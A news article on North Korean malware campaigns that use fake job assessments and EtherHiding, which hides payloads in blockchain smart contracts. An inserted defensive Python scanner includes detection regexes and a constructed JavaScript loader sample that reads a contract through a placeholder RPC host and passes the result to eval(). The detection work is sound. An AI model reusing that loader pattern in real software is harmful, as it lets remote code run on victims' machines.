North Korean-linked threat actors are using distributed and evasive malware tools to escalate their cyber operations, according to new research from Cisco Talos and Google Threat Intelligence Group.
The campaign aims to steal cryptocurrencies, infiltrate networks, and evade detection through sophisticated recruitment scams.
Evolving malware technology reflects expanded functionality
Cisco Talos researchers have identified an ongoing campaign by the North Korean group Famous Chollima. The group used two complementary malware strains: BeaverTail and OtterCookie. These programs have traditionally been used to steal credentials and leak data, but are now evolving to integrate new capabilities and interoperate more closely.
In a recent incident involving a Sri Lankan organization, attackers lured job candidates into installing disguised malicious code as part of a technical assessment. Although the organization itself was not a direct target, the case highlights the broader risk to individuals drawn into fake job offers. Cisco Talos analysts also observed a keylogging and screenshot module linked to OtterCookie; it secretly recorded keystrokes, captured desktop images, and automatically sent them to a remote command server.
Cisco Talos reports that the North Korean group Famous Chollima is using a new JavaScript module that combines BeaverTail and OtterCookie for keylogging and screenshots to target job seekers through fake offers and malicious Node.js packages. #Cybersecurity https://t.co/vRba8a3GcT
— Cyber_OSINT (@Cyber_O51NT) October 16, 2025
This observation highlights the continued evolution of North Korean-aligned threat groups and their focus on social engineering techniques to compromise unsuspecting targets.
Blockchain used as command infrastructure
Google’s Threat Intelligence Group (GTIG) has identified an operation by threat actor UNC5342 linked to North Korea. The group used a new malware called “EtherHiding”. This tool hides malicious JavaScript payloads on public blockchains, turning them into decentralized command and control (C2) networks.
Storing the payload on a blockchain lets attackers modify the malware's behavior remotely without operating traditional servers, which makes takedowns by law enforcement more difficult. Additionally, GTIG reported that UNC5342 applied EtherHiding in a social engineering campaign called Contagious Interview, previously identified by Palo Alto Networks, which indicates the persistent presence of threat actors aligned with North Korea.
What is EtherHiding?
This is a new technique in which attackers embed malicious payloads (such as JADESNOW and INVISIBLEFERRET malware) inside smart contracts on public blockchains (such as BNB Smart Chain and Ethereum). https://t.co/AyKeSuPyWW pic.twitter.com/we4NV2PTu5
— blackorbird (@blackorbird) October 16, 2025
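As an added illustration of the defensive side of the EtherHiding technique described above (example code written for this page, not from the article, Cisco Talos or GTIG), here is a small Python heuristic that flags JavaScript which both reads from a public blockchain (JSON-RPC eth_call or web3-style contract reads, an assumed indicator set) and hands the result to a dynamic code-execution sink. The sample scripts are constructed for the example.

```python
import re

# Assumed indicator set for this example (not published IOCs): a script that
# reads data from a public chain AND feeds fetched content into eval-like
# sinks matches the EtherHiding pattern of pulling a payload from a contract.
CHAIN_READ_PATTERNS = [
    r"\beth_call\b",                            # raw JSON-RPC contract read
    r"\.methods\.\w+\([^)]*\)\.call\(",         # web3.js contract read
    r"https?://[^\"']*(bsc|binance|ethereum|infura|alchemy|ankr)[^\"']*",
]
EXEC_SINK_PATTERNS = [
    r"\beval\s*\(",                             # eval(...)
    r"new\s+Function\s*\(",                     # new Function(...)
    r"\bsetTimeout\s*\(\s*[\"']",               # setTimeout("code", ...)
]

def scan_script(source: str) -> dict:
    """Return which chain-read and exec-sink indicators fire for a JS source.
    'suspicious' is true only when both classes fire; a dapp that merely reads
    a contract, or a script that merely uses eval, is not flagged on its own."""
    chain_hits = [p for p in CHAIN_READ_PATTERNS if re.search(p, source, re.I)]
    sink_hits = [p for p in EXEC_SINK_PATTERNS if re.search(p, source)]
    return {
        "chain_read": chain_hits,
        "exec_sink": sink_hits,
        "suspicious": bool(chain_hits) and bool(sink_hits),
    }

# Constructed sample: loader that reads a contract and executes the result.
SUSPICIOUS_JS = """
const rpc = "https://bsc.rpc.example.invalid/";   // constructed placeholder RPC
fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1,
  method: "eth_call", params: [{to: CONTRACT, data: "0x00"}, "latest"]})})
  .then(r => r.json()).then(j => eval(decode(j.result)));
"""

# Constructed sample: ordinary dapp code that only displays a token balance.
BENIGN_DAPP_JS = """
const bal = await token.methods.balanceOf(account).call();
document.getElementById("balance").textContent = bal;
"""

if __name__ == "__main__":
    for name, src in [("loader", SUSPICIOUS_JS), ("dapp", BENIGN_DAPP_JS)]:
        print(name, scan_script(src))
```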
Targeting job seekers to steal virtual currency and data
According to Google researchers, these cyber operations typically begin with fraudulent job listings targeting professionals in the cryptocurrency and cybersecurity industries. Victims are invited to take part in fake assessments and are instructed to download a file with malicious code embedded in it.
The infection process often involves multiple malware families such as JadeSnow, BeaverTail, and InvisibleFerret. Together, these allow attackers to gain access to systems, steal credentials, and efficiently deploy ransomware. End goals range from espionage and financial theft to long-term network intrusion.
Cisco and Google have published indicators of compromise (IOCs) to help organizations detect and respond to ongoing North Korea-related cyber threats. These resources provide technical details to identify malicious activity and mitigate potential breaches. Researchers warn that the integration of blockchain and modular malware will likely continue to complicate global cybersecurity defense efforts.
The article North Korean hackers deploy blockchain-based tools in global cyber attack was first published on BeInCrypto.